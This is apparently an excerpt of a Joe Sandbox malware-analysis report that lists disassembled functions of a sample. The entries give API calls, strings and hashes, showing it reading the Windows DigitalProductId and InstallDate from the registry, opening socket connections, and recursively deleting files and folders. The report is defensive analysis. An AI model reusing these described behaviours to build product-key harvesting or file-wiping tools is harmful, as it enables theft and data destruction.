Instruction Fuzzy Hash: 3711A1F16002146BDB209E688DC5FE67AAC9B043A1F508636FA19E71D0E274DE808B94

Function 004067E9 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 56stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 00406731
GetIfTable.IPHLPAPI(00000000,00000000,00000001), ref: 0040676F
??2@YAPAXI@Z.MSVCRT(00000000,?,?,KVa7,00000000,?,?,?,00000400,00000000), ref: 0040678E
GetIfTable.IPHLPAPI(00000000,00000000,00000001), ref: 004067C5
sprintf.MSVCRT ref: 004068CD
_mbscpy.MSVCRT(-00000023,?,?,?,?,?,?,?,KVa7,00000000,?,?,?,00000400,00000000), ref: 004068E7
??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,00000001,?,?,?,KVa7,00000000,?,?,?,00000400,00000000), ref: 0040693E

Strings

KVa7, xrefs: 0040685E
%u Gbps, xrefs: 004068C1

Memory Dump Source

Source File: 00000004.00000002.2594167310.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2594110174.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594167310.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594246572.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594267819.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_v5.jbxd

Yara matches

Similarity

API ID: Table$??2@??3@_mbscpysprintfstrcmp
String ID: %u Gbps$KVa7
API String ID: 3420875952-2796686009
Opcode ID: 2e6fa44a5d2f037096ad7b5d024fbd0ea36ba1bcc104164832898df47580a20a
Instruction ID: a7a8e1041bd709416f2cdac98afc023946ef9f584d3dcb890be07267fec2ea1a
Opcode Fuzzy Hash: 2e6fa44a5d2f037096ad7b5d024fbd0ea36ba1bcc104164832898df47580a20a
Instruction Fuzzy Hash: 18210E70A005158BD72ECB04CE94BA9B3BAFB94309F0941FDE10EAB6E5D6356F918F44

Function 00402A37 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 8libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(WS2_32.dll,htons), ref: 00402A46
GetProcAddress.KERNEL32(00000000), ref: 00402A4D

Strings

WS2_32.dll, xrefs: 00402A41
htons, xrefs: 00402A3C

Memory Dump Source

Source File: 00000004.00000002.2594167310.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2594110174.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594167310.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594246572.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594267819.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_v5.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: WS2_32.dll$htons
API String ID: 2574300362-178149120
Opcode ID: d30d6111be414e93e59afff5acc367f2655241c9da2ea0a2795162f196827327
Instruction ID: 2561ae12f7e90b5fc780e89bc5807c04a20d660f8c717e8047036cfcaa43c05d
Opcode Fuzzy Hash: d30d6111be414e93e59afff5acc367f2655241c9da2ea0a2795162f196827327
Instruction Fuzzy Hash: BBC09BB5551280EBC7006B719F0D5453994B6047017100077F141F15F1DB7800409F1D

Function 00408680 Relevance: 6.0, APIs: 4, Instructions: 37networkCOMMON

Download Yara Rule

APIs

socket.WS2_32(00000002,00000001,00000000), ref: 0040868A
htons.WS2_32 ref: 004086B2
connect.WS2_32(00000000,?,00000010), ref: 004086C5
closesocket.WS2_32(00000000), ref: 004086D1

Memory Dump Source

Source File: 00000004.00000002.2594167310.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2594110174.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594167310.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594246572.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594267819.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_v5.jbxd

Yara matches

Similarity

API ID: closesocketconnecthtonssocket
String ID:
API String ID: 3817148366-0
Opcode ID: 0a2ed5afde3e2c3bda8bc7a891d523bcba82ca95b19b28c83635fe27b66edda0
Instruction ID: b5f64500789357e91306605df317961a8cc373726e32a30d19d3821c8ed13c85
Opcode Fuzzy Hash: 0a2ed5afde3e2c3bda8bc7a891d523bcba82ca95b19b28c83635fe27b66edda0
Instruction Fuzzy Hash: 02F062349042206BD600EB6C9D46BEB76A4EF89370F804B59FAB9A62E1E775440447DA

Analysis Process: .exePID: 7512, Parent PID: 7380COMMON

Executed Functions

Function 00433020 Relevance: 531.4, APIs: 35, Strings: 267, Instructions: 2903windowregistrytimeCOMMON

Download Yara Rule

APIs

Part of subcall function 00459941: KiUserCallbackDispatcher.NTDLL(?,?), ref: 0045994E

Part of subcall function 004597B2: GetDlgItem.USER32(?,?), ref: 004597BF

SendMessageA.USER32(?,000000CF,00000001,00000000), ref: 0043308A

Part of subcall function 004306A0: RegOpenKeyExA.KERNEL32(80000002,80000002,00000000,000F003F,?,?,00402ED4,80000002,SOFTWARE\Microsoft\Internet Explorer\Registration), ref: 004306B5
Part of subcall function 004306A0: GetLastError.KERNEL32(?,00402ED4,80000002,SOFTWARE\Microsoft\Internet Explorer\Registration), ref: 004306BF

RegQueryValueExA.KERNEL32(00000000,DigitalProductId,00000000,00000000,?,?,00465CDE), ref: 00433117
SystemTimeToVariantTime.OLEAUT32(00263B80,?), ref: 00433856
SendMessageA.USER32(?,0000014B,00000000,00000000), ref: 00433898
SendMessageA.USER32(?,00000143,00000000,(GMT-12:00) International Date Line West), ref: 004338AD
SendMessageA.USER32(?,00000143,00000000,(GMT-11:00) Midway Island), ref: 004338C2
SendMessageA.USER32(?,00000143,00000000,(GMT-10:00) Hawaii), ref: 004338D7
SendMessageA.USER32(?,00000143,00000000,(GMT-09:00) Alaska), ref: 004338EC
SendMessageA.USER32(?,00000143,00000000,(GMT-08:00) Pacific time (US & Canada)), ref: 00433901
SendMessageA.USER32(?,00000143,00000000,(GMT-07:00) Mountain time (US & Canada)), ref: 00433916
SendMessageA.USER32(?,00000143,00000000,(GMT-06:00) Central time (US & Canada)), ref: 0043392B
SendMessageA.USER32(?,00000143,00000000,(GMT-05:00) Eastern time (US & Canada)), ref: 00433940
SendMessageA.USER32(?,00000143,00000000,(GMT-04:00) Atlantic time (Canada)), ref: 00433955
SendMessageA.USER32(?,00000143,00000000,(GMT-03:00) Brasilia), ref: 0043396A
SendMessageA.USER32(?,00000143,00000000,(GMT-02:00) Mid-Atlantic), ref: 0043397F
SendMessageA.USER32(?,00000143,00000000,(GMT-01:00) Cape Verde Is.), ref: 00433994
SendMessageA.USER32(?,00000143,00000000,(GMT+00:00) Greenwich Mean Time), ref: 004339A9
SendMessageA.USER32(?,00000143,00000000,(GMT+01:00) West Central Africa), ref: 004339BE
SendMessageA.USER32(?,00000143,00000000,(GMT+02:00) Vilius, Jerusalem), ref: 004339D3
SendMessageA.USER32(?,00000143,00000000,(GMT+03:00) Baghdad, Moscow), ref: 004339E8
SendMessageA.USER32(?,00000143,00000000,(GMT+04:00) Abu Dhabi), ref: 004339FD
SendMessageA.USER32(?,00000143,00000000,(GMT+05:00) Islamabad), ref: 00433A12
SendMessageA.USER32(?,00000143,00000000,(GMT+06:00) Almaty), ref: 00433A27
SendMessageA.USER32(?,00000143,00000000,(GMT+07:00) Bangkok, Hanoi, Krasnoyask), ref: 00433A3C
SendMessageA.USER32(?,00000143,00000000,(GMT+08:00) Beijing, Hong Kong), ref: 00433A51
SendMessageA.USER32(?,00000143,00000000,(GMT+09:00) Seoul, Tokyo), ref: 00433A66
SendMessageA.USER32(?,00000143,00000000,(GMT+10:00) Brisbane, Melbourne, Sydney), ref: 00433A7B
SendMessageA.USER32(?,00000143,00000000,(GMT+11:00) Solomon Is.), ref: 00433A90
SendMessageA.USER32(?,00000143,00000000,(GMT+12:00) Fiji), ref: 00433AA5
GetTimeZoneInformation.KERNEL32(?), ref: 00433AAF
SendMessageA.USER32(?,0000014E,-0000000C,00000000), ref: 0043432F
SendMessageA.USER32(?,0000014B,00000000,00000000), ref: 00435143
SendMessageA.USER32(?,00000143,00000000,?), ref: 0043518C
RegOpenKeyExA.KERNEL32(80000002,?,00000000,00020019,?), ref: 0043520B
SendMessageA.USER32(?,0000014E,FFFFFFFF,00000000), ref: 0043545D

Strings

Albanian(Albania), xrefs: 00434345
Spanish(Dominican Republic), xrefs: 004348D5
00001801, xrefs: 00434AD6
00000C09, xrefs: 00434C26
Arabic(Syria), xrefs: 00434415
00000410, xrefs: 00434E26
Arabic(Yemen), xrefs: 00434445
Arabic(Jordan), xrefs: 00434395
(GMT+05:00) Islamabad, xrefs: 00433A05
Chinese(China), xrefs: 00434495
00001007, xrefs: 00434DB6
BCDFGHJKMPQRTVWXY2346789, xrefs: 0043317F
00000807, xrefs: 00434DC6
00001404, xrefs: 00434B86
Serbian(Latin), xrefs: 00434855
Arabic(Lebanon), xrefs: 004343B5
(GMT+10:00) Brisbane, Melbourne, Sydney, xrefs: 00433A6E
0000041B, xrefs: 00434F66
Slovenian(Slovenia), xrefs: 00434875
00000404, xrefs: 00434BB6
Danish(Denmark), xrefs: 004344E5
00000413, xrefs: 00434C16
Spanish(Ecuador), xrefs: 004348E5
Malay(Malaysia), xrefs: 004347C5
00000419, xrefs: 00434F36
English(Canada), xrefs: 00434545
0000180C, xrefs: 00434D66
French(France), xrefs: 00434645
German(Liechtenstein), xrefs: 004346A5
0000, xrefs: 004352F7
0000083E, xrefs: 00434EB6
(GMT, xrefs: 00433CF7, 004340D7
Spanish(Venezuela), xrefs: 004349A5
00000407, xrefs: 00434D96
Arabic(Morocco), xrefs: 004343D5
00000405, xrefs: 00434BD6
Swahili(Kenya), xrefs: 004349B5
Spanish(Spain), xrefs: 00434985
Ukrainian(Ukraine), xrefs: 00434A15
Thai(Thailand), xrefs: 004349F5
Spanish(Argenuser), xrefs: 00434885
English(United States), xrefs: 004345D5
:00) , xrefs: 00433B72, 00433D0A
(GMT-11:00) Midway Island, xrefs: 004338B5
Lithuanian(Lithuania), xrefs: 004347A5
00000426, xrefs: 00434E96
Arabic(Bahrain), xrefs: 00434365
Japanese(Japan), xrefs: 00434745
Arabic(Tunisia), xrefs: 00434425
Spanish(Costa Rica), xrefs: 004348C5
00001009, xrefs: 00434C46
Dutch(The Netherlands), xrefs: 00434515
0000041D, xrefs: 004350D6
00000414, xrefs: 00434EE6
00001401, xrefs: 00434A56
0000081D, xrefs: 004350C6
Arabic(United Arab Emirates), xrefs: 00434435
InstallDate, xrefs: 004330C0
0000400A, xrefs: 00434F96
0000080C, xrefs: 00434D26
Spanish(Puerto Rico), xrefs: 00434975
00003009, xrefs: 00434CE6
Swedish(Sweden), xrefs: 004349D5
00000425, xrefs: 00434CF6
0000045A, xrefs: 004350E6
Spanish(Bolivia), xrefs: 00434895
German(Austria), xrefs: 00434685
!, xrefs: 004340C5
English(Trinidad and Tobago), xrefs: 004345B5
00004C0A, xrefs: 00435036
Swedish(Finland), xrefs: 004349C5
00001409, xrefs: 00434C86
Latvian(Latvia), xrefs: 00434795
Portuguese(Portugal), xrefs: 00434815
English(Caribbean), xrefs: 00434555
0000041E, xrefs: 004350F6
0000180A, xrefs: 00435046
Mongolian(Mongolia), xrefs: 004347D5
00000810, xrefs: 00434E36
(GMT+04:00) Abu Dhabi, xrefs: 004339F0
(GMT-10:00) Hawaii, xrefs: 004338CA
English(Belize), xrefs: 00434535
Bulgarian(Bulgaria), xrefs: 00434465
(GMT-09:00) Alaska, xrefs: 004338DF
German(Germany), xrefs: 00434695
English(Australia), xrefs: 00434525
00000809, xrefs: 00434CC6
00002809, xrefs: 00434C36
Chinese(Singapore), xrefs: 004344A5
00000C07, xrefs: 00434D86
00000406, xrefs: 00434BE6
Spanish(Panama), xrefs: 00434945
(GMT+, xrefs: 00433B5F, 00433EB5
(GMT-05:00) Eastern time (US & Canada), xrefs: 00433933
00002009, xrefs: 00434C76
French(Canada), xrefs: 00434635
#, xrefs: 004340F5
00000804, xrefs: 00434B96
00000439, xrefs: 00434DF6
0000140C, xrefs: 00434D56
0000041A, xrefs: 00434BC6
00003409, xrefs: 00434C96
Chinese(Hong Kong SAR), xrefs: 00434475
DigitalProductId, xrefs: 00433109
Spanish(Guatemala), xrefs: 00434905
00000402, xrefs: 00434B66
00003801, xrefs: 00434B36
0000100C, xrefs: 00434D76
0000040D, xrefs: 00434DE6
00002C09, xrefs: 00434CB6
Czech(Czech Republic), xrefs: 004344D5
00000C04, xrefs: 00434B76
00001004, xrefs: 00434BA6
00000411, xrefs: 00434E46
Dhivehi(Maldives), xrefs: 004344F5
French(Luxembourg), xrefs: 00434655
00002401, xrefs: 00434B46
French(Monaco), xrefs: 00434665
0000044B, xrefs: 00434E56
Arabic(Qatar), xrefs: 004343F5
Arabic(Egypt), xrefs: 00434375
00000418, xrefs: 00434F26
00002C0A, xrefs: 00434F86
00001407, xrefs: 00434DA6
00001C01, xrefs: 00434B26
Spanish(Chile), xrefs: 004348A5
Croatian(Croatia), xrefs: 004344C5
SYSTEM\CurrentControlSet\Control\Keyboard Layouts\, xrefs: 004351E6
Chinese(Macau SAR), xrefs: 00434485
00000401, xrefs: 00434B06
Romanian(Romania), xrefs: 00434825
0000100A, xrefs: 00435006
0000041F, xrefs: 00435106
Arabic(Oman), xrefs: 004343E5
Estonian(Estonia), xrefs: 004345F5
(GMT+09:00) Seoul, Tokyo, xrefs: 00433A59
0000480A, xrefs: 00435016
00000412, xrefs: 00434E76
Belarusian(Belarus), xrefs: 00434455
Portuguese(Brazil), xrefs: 00434805
Slovak(Slovakia), xrefs: 00434865
(GMT-02:00) Mid-Atlantic, xrefs: 00433972
00000427, xrefs: 00434EA6
0000340A, xrefs: 00434FA6
(GMT+06:00) Almaty, xrefs: 00433A1A
00000424, xrefs: 00434F76
Indonesian(Indonesia), xrefs: 00434715
English(Ireland), xrefs: 00434565
00000416, xrefs: 00434F06
English(New Zealand), xrefs: 00434585
English(Jamaica), xrefs: 00434575
0000040E, xrefs: 00434E06
00002409, xrefs: 00434C56
Chinese(Taiwan), xrefs: 004344B5
English(United Kingdom), xrefs: 004345C5
00000C01, xrefs: 00434A76
(GMT-08:00) Pacific time (US & Canada), xrefs: 004338F4
00000441, xrefs: 004350B6
00002C01, xrefs: 00434A96
0000042A, xrefs: 00435126
00003401, xrefs: 00434AA6
(GMT-01:00) Cape Verde Is., xrefs: 00433987
Spanish(Peru), xrefs: 00434965
Finnish(Finland), xrefs: 00434615
Spanish(Nicaragua), xrefs: 00434935
0000081A, xrefs: 00434F56
wwww, xrefs: 00433AE3
(GMT+08:00) Beijing, Hong Kong, xrefs: 00433A44
%, xrefs: 00434121
00000C0A, xrefs: 00435086
&, xrefs: 00434139
0000300A, xrefs: 00434FE6
0000140A, xrefs: 00434FC6
Italian(Italy), xrefs: 00434725
C, xrefs: 00433131
00000813, xrefs: 00434C06
(GMT+11:00) Solomon Is., xrefs: 00433A83
(GMT-04:00) Atlantic time (Canada), xrefs: 00433948
00000421, xrefs: 00434E16
(, xrefs: 00435466
French(Switzerland), xrefs: 00434675
Default, xrefs: 0043529D
English(Philippines), xrefs: 00434595
Kyrgyz(Kazakhstan), xrefs: 00434785
(GMT+07:00) Bangkok, Hanoi, Krasnoyask, xrefs: 00433A2F
German(Switzerland), xrefs: 004346C5
Farsi(Iran), xrefs: 00434605
(GMT-03:00) Brasilia, xrefs: 0043395D
0000041C, xrefs: 00434A46
0000040C, xrefs: 00434D46
0000500A, xrefs: 00435076
00003C01, xrefs: 00434A66
00003C0A, xrefs: 00435056
00000429, xrefs: 00434D06
0000240A, xrefs: 00434FB6
SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 004330A6
0000040B, xrefs: 00434D16
00003001, xrefs: 00434AB6
Norwegian(Norway), xrefs: 004347E5
Arabic(Algeria), xrefs: 00434355
00000408, xrefs: 00434DD6
00001001, xrefs: 00434AC6
(GMT+12:00) Fiji, xrefs: 00433A98
00000465, xrefs: 00434BF6
Syriac(Syria), xrefs: 004349E5
Greek(Greece), xrefs: 004346D5
Arabic(Iraq), xrefs: 00434385
Malay(Brunei), xrefs: 004347B5
Hungarian(Hungary), xrefs: 00434705
Kazakh(Kazakhstan), xrefs: 00434765
Korean(Korea), xrefs: 00434775
00002001, xrefs: 00434AE6
0000043F, xrefs: 00434E66
Russian(Russia), xrefs: 00434835
Polish(Poland), xrefs: 004347F5
00001C0A, xrefs: 00434FD6
English(South Africa), xrefs: 004345A5
00000409, xrefs: 00434CD6
00004001, xrefs: 00434AF6
00000423, xrefs: 00434B56
Dutch(Belgium), xrefs: 00434505
00000450, xrefs: 00434ED6
Italian(Switzerland), xrefs: 00434735
0000280A, xrefs: 00435066
French(Belgium), xrefs: 00434625
00000C1A, xrefs: 00434F46
0000200A, xrefs: 004350A6
Spanish(El Salvador), xrefs: 004348F5
Spanish(Colombia), xrefs: 004348B5
(GMT+01:00) West Central Africa, xrefs: 004339B1
00000816, xrefs: 00434F16
Arabic(Libya), xrefs: 004343C5
Spanish(Honduras), xrefs: 00434915
SYSTEM\CurrentControlSet\Control\Nls\Language, xrefs: 00435280
00001809, xrefs: 00434C66
(GMT+00:00) Greenwich Mean Time, xrefs: 0043399C
Spanish(Uruguay), xrefs: 00434995
Arabic(Kuwait), xrefs: 004343A5
(GMT-12:00) International Date Line West, xrefs: 004338A0
00000440, xrefs: 00434E86
Spanish(Mexico), xrefs: 00434925
0000080A, xrefs: 00435026
0000380A, xrefs: 00435096
Hindi(India), xrefs: 004346F5
Arabic(Saudi Arabia), xrefs: 00434405
(GMT-06:00) Central time (US & Canada), xrefs: 0043391E
(GMT-07:00) Mountain time (US & Canada), xrefs: 00433903
Vietnamese(Vietnam), xrefs: 00434A25
0000043E, xrefs: 00434EC6
Serbian(Cyrillic), xrefs: 00434845
00000415, xrefs: 00434EF6
00000422, xrefs: 00435116
Kannada(India), xrefs: 00434755
00001C09, xrefs: 00434CA6
00002801, xrefs: 00434B16
0000440A, xrefs: 00434FF6
Hebrew(Israel), xrefs: 004346E5
English(Zimbabwe), xrefs: 004345E5
(GMT+02:00) Vilius, Jerusalem, xrefs: 004339C6
00000801, xrefs: 00434A86
Turkish(Turkey), xrefs: 00434A05
), xrefs: 004352E1
Spanish(Paraguay), xrefs: 00434955
$, xrefs: 00434109
00000C0C, xrefs: 00434D36
German(Luxembourg), xrefs: 004346B5
(GMT+03:00) Baghdad, Moscow, xrefs: 004339DB

Memory Dump Source

Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_ .jbxd

Similarity

API ID: MessageSend$Time$Open$CallbackDispatcherErrorInformationItemLastQuerySystemUserValueVariantZone
String ID: !$#$$$%$&$($(GMT$(GMT+$(GMT+00:00) Greenwich Mean Time$(GMT+01:00) West Central Africa$(GMT+02:00) Vilius, Jerusalem$(GMT+03:00) Baghdad, Moscow$(GMT+04:00) Abu Dhabi$(GMT+05:00) Islamabad$(GMT+06:00) Almaty$(GMT+07:00) Bangkok, Hanoi, Krasnoyask$(GMT+08:00) Beijing, Hong Kong$(GMT+09:00) Seoul, Tokyo$(GMT+10:00) Brisbane, Melbourne, Sydney$(GMT+11:00) Solomon Is.$(GMT+12:00) Fiji$(GMT-01:00) Cape Verde Is.$(GMT-02:00) Mid-Atlantic$(GMT-03:00) Brasilia$(GMT-04:00) Atlantic time (Canada)$(GMT-05:00) Eastern time (US & Canada)$(GMT-06:00) Central time (US & Canada)$(GMT-07:00) Mountain time (US & Canada)$(GMT-08:00) Pacific time (US & Canada)$(GMT-09:00) Alaska$(GMT-10:00) Hawaii$(GMT-11:00) Midway Island$(GMT-12:00) International Date Line West$)$0000$00000401$00000402$00000404$00000405$00000406$00000407$00000408$00000409$0000040B$0000040C$0000040D$0000040E$00000410$00000411$00000412$00000413$00000414$00000415$00000416$00000418$00000419$0000041A$0000041B$0000041C$0000041D$0000041E$0000041F$00000421$00000422$00000423$00000424$00000425$00000426$00000427$00000429$0000042A$00000439$0000043E$0000043F$00000440$00000441$0000044B$00000450$0000045A$00000465$00000801$00000804$00000807$00000809$0000080A$0000080C$00000810$00000813$00000816$0000081A$0000081D$0000083E$00000C01$00000C04$00000C07$00000C09$00000C0A$00000C0C$00000C1A$00001001$00001004$00001007$00001009$0000100A$0000100C$00001401$00001404$00001407$00001409$0000140A$0000140C$00001801$00001809$0000180A$0000180C$00001C01$00001C09$00001C0A$00002001$00002009$0000200A$00002401$00002409$0000240A$00002801$00002809$0000280A$00002C01$00002C09$00002C0A$00003001$00003009$0000300A$00003401$00003409$0000340A$00003801$0000380A$00003C01$00003C0A$00004001$0000400A$0000440A$0000480A$00004C0A$0000500A$:00) $Albanian(Albania)$Arabic(Algeria)$Arabic(Bahrain)$Arabic(Egypt)$Arabic(Iraq)$Arabic(Jordan)$Arabic(Kuwait)$Arabic(Lebanon)$Arabic(Libya)$Arabic(Morocco)$Arabic(Oman)$Arabic(Qatar)$Arabic(Saudi Arabia)$Arabic(Syria)$Arabic(Tunisia)$Arabic(United Arab Emirates)$Arabic(Yemen)$BCDFGHJKMPQRTVWXY2346789$Belarusian(Belarus)$Bulgarian(Bulgaria)$C$Chinese(China)$Chinese(Hong Kong SAR)$Chinese(Macau SAR)$Chinese(Singapore)$Chinese(Taiwan)$Croatian(Croatia)$Czech(Czech Republic)$Danish(Denmark)$Default$Dhivehi(Maldives)$DigitalProductId$Dutch(Belgium)$Dutch(The Netherlands)$English(Australia)$English(Belize)$English(Canada)$English(Caribbean)$English(Ireland)$English(Jamaica)$English(New Zealand)$English(Philippines)$English(South Africa)$English(Trinidad and Tobago)$English(United Kingdom)$English(United States)$English(Zimbabwe)$Estonian(Estonia)$Farsi(Iran)$Finnish(Finland)$French(Belgium)$French(Canada)$French(France)$French(Luxembourg)$French(Monaco)$French(Switzerland)$German(Austria)$German(Germany)$German(Liechtenstein)$German(Luxembourg)$German(Switzerland)$Greek(Greece)$Hebrew(Israel)$Hindi(India)$Hungarian(Hungary)$Indonesian(Indonesia)$InstallDate$Italian(Italy)$Italian(Switzerland)$Japanese(Japan)$Kannada(India)$Kazakh(Kazakhstan)$Korean(Korea)$Kyrgyz(Kazakhstan)$Latvian(Latvia)$Lithuanian(Lithuania)$Malay(Brunei)$Malay(Malaysia)$Mongolian(Mongolia)$Norwegian(Norway)$Polish(Poland)$Portuguese(Brazil)$Portuguese(Portugal)$Romanian(Romania)$Russian(Russia)$SOFTWARE\Microsoft\Windows NT\CurrentVersion$SYSTEM\CurrentControlSet\Control\Keyboard Layouts\$SYSTEM\CurrentControlSet\Control\Nls\Language$Serbian(Cyrillic)$Serbian(Latin)$Slovak(Slovakia)$Slovenian(Slovenia)$Spanish(Argenuser)$Spanish(Bolivia)$Spanish(Chile)$Spanish(Colombia)$Spanish(Costa Rica)$Spanish(Dominican Republic)$Spanish(Ecuador)$Spanish(El Salvador)$Spanish(Guatemala)$Spanish(Honduras)$Spanish(Mexico)$Spanish(Nicaragua)$Spanish(Panama)$Spanish(Paraguay)$Spanish(Peru)$Spanish(Puerto Rico)$Spanish(Spain)$Spanish(Uruguay)$Spanish(Venezuela)$Swahili(Kenya)$Swedish(Finland)$Swedish(Sweden)$Syriac(Syria)$Thai(Thailand)$Turkish(Turkey)$Ukrainian(Ukraine)$Vietnamese(Vietnam)$wwww
API String ID: 3508335397-1490658257
Opcode ID: 627a35e1b08555edaf0af8ad1688b17534d88a004a0355c9889eb5397b03b424
Instruction ID: 11e6bca3a7b78fddd481d42fe835fe7653ca2f41bf506d87efe11ac05451b3a8
Opcode Fuzzy Hash: 627a35e1b08555edaf0af8ad1688b17534d88a004a0355c9889eb5397b03b424
Instruction Fuzzy Hash: 7233E275300B00AFC354DF2DC895F5A73E5AFC8718F10861EF85A9B2D2CB78A9468B59

Function 00405260 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 220fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(?,?,\*.*,00000004,?,?), ref: 0040530E
GetFileAttributesA.KERNEL32(?,?,?,0000005C,?,?), ref: 00405423
SetFileAttributesA.KERNEL32(?,00000000), ref: 00405432
RemoveDirectoryA.KERNEL32(?), ref: 0040544C
DeleteFileA.KERNEL32(?), ref: 0040547E
FindNextFileA.KERNEL32(?,?), ref: 0040548E
FindClose.KERNEL32(?), ref: 004054A1

Strings

index.dat, xrefs: 0040545C
desktop.ini, xrefs: 004053BC
\*.*, xrefs: 004052F6

Memory Dump Source

Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_ .jbxd

Similarity

API ID: File$Find$Attributes$CloseDeleteDirectoryFirstNextRemove
String ID: \*.*$desktop.ini$index.dat
API String ID: 799748605-3685876507
Opcode ID: 80584bf7c0bad225ea78bdcef72c35823c7484b3c5839c582d24ccd8dfbf2b61
Instruction ID: 0650860c3c1e2d53bc6fffd3340b65124f85220920b4efda78b7a122019db1cc
Opcode Fuzzy Hash: 80584bf7c0bad225ea78bdcef72c35823c7484b3c5839c582d24ccd8dfbf2b61
Instruction Fuzzy Hash: D881C170104B429FD310CB24CC48BABB7A8EF85355F148A6EF855972D1EB79D809CF5A

Function 0045B051 Relevance: 15.1, APIs: 10, Instructions: 102stringfileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0045B056
GetFullPathNameA.KERNEL32(?,00000104,?,?,?,?,?), ref: 0045B080
lstrcpynA.KERNEL32(?,?,00000104), ref: 0045B091

Part of subcall function 0045B00F: lstrcpynA.KERNEL32(00000000,?,00000104,0045B0C3,?,?), ref: 0045B034
Part of subcall function 0045B00F: PathStripToRootA.SHLWAPI(00000000), ref: 0045B03B

PathIsUNCA.SHLWAPI(?,?,?), ref: 0045B0C6
GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000), ref: 0045B0EA
CharUpperA.USER32(?), ref: 0045B102
FindFirstFileA.KERNEL32(?,?), ref: 0045B11B
FindClose.KERNEL32(00000000), ref: 0045B127
lstrlenA.KERNEL32(?), ref: 0045B144
lstrcpyA.KERNEL32(?,?), ref: 0045B163

Memory Dump Source

Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_ .jbxd

Similarity

API ID: Path$Findlstrcpyn$CharCloseFileFirstFullH_prologInformationNameRootStripUpperVolumelstrcpylstrlen
String ID:
